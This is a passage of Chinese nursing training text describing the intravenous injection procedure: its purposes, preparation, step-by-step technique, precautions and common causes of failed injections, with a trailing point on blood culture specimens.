5、血培養(yǎng)標(biāo)本應(yīng)注入無菌容器內(nèi)，不可混入消毒劑、防腐劑及藥物，以免影響檢驗結(jié)果。

靜脈注射技術(shù) 目的

1、注入藥物，用于藥物不宜口服、皮下、肌內(nèi)注射，或需迅速發(fā)揮藥效時。

2、注入藥物作某些診斷性檢查。

3、靜脈營養(yǎng)治療。

操作前準(zhǔn)備階段

? 護(hù)士：洗手，戴口罩，檢查并核對藥物、醫(yī)囑，按醫(yī)囑準(zhǔn)備藥液。

? 物品：治療盤，注射器(根據(jù)藥量準(zhǔn)備)、頭皮針、藥液、止血帶、輸液貼、治療巾、消毒墊巾、消毒液等。? 環(huán)境：清潔、舒適。? 病人：坐位或臥位。操作步驟階段 治療室：

?

1、核對醫(yī)囑，準(zhǔn)備及檢查藥液，檢查無菌物品。

?

2、消毒瓶蓋二次(安瓿鋸前后各消毒1次)，打開安瓿，取出注射器抽吸藥液(劑量準(zhǔn)確)。

?

3、放入治療盤中備用。病房：

?

1、攜用物至床旁，核對后向病人解釋操作的目的，方法及所注藥物及作用。?

2、暴露肢體，扎止血帶選擇血管后，松開止血帶，在預(yù)穿刺血管的下面放消毒墊巾。?

3、消毒皮膚一次，皮膚待干,撕開輸液貼貼在治療盤上，扎止血帶(在穿刺部位上方約6cm處扎緊)，再次消毒皮膚，囑病人握拳使靜脈充盈。?

4、排盡注射器內(nèi)空氣。?

5、再次核對。

?

6、左手繃緊皮膚，右手持注射器，針頭斜面向上進(jìn)針(與皮膚呈20-30度角)，見回血沿血管進(jìn)針少許，松止血帶并囑病人松拳。

?

7、固定針?biāo)ň徛⑷胨幰?，同時觀察病人有無不良反應(yīng)，(注射過程中，可稍抽回血以觀察針頭有無脫出血管)。

?

8、注射完畢拔針，按壓注射部位與進(jìn)針點。?

9、再次查對。

注意事項

1、嚴(yán)格執(zhí)行查對制度和無菌操作制度。

2、對需要長期靜脈給藥的患者，應(yīng)當(dāng)保護(hù)血管，由遠(yuǎn)心端至近心端選擇血管穿刺。

3、注射過程中隨時觀察患者的放應(yīng)。

4、靜脈注射對組織有強(qiáng)烈刺激性的藥物，一定要在確認(rèn)針頭在靜脈內(nèi)后方可推注藥液，以免藥液外溢導(dǎo)致組織壞死。靜脈注射失敗的常見原因

1、針頭刺入靜脈過少，抽吸雖有回血，但松解止血帶時靜脈回縮，針頭滑出血管，藥液注入皮下。

2、針頭斜面未完全刺入靜脈，部分在血管外，抽吸雖有回血，但推注時藥液溢至皮下，局部隆起并有痛感。

3、針頭刺入較深，斜面一半穿破對側(cè)血管壁，抽吸有回血，推注少量藥液，局部可無隆起，但因部分藥液溢出至深層組織，患者有痛感。

4、針頭刺入過深，穿破對側(cè)血管壁，抽吸無回血。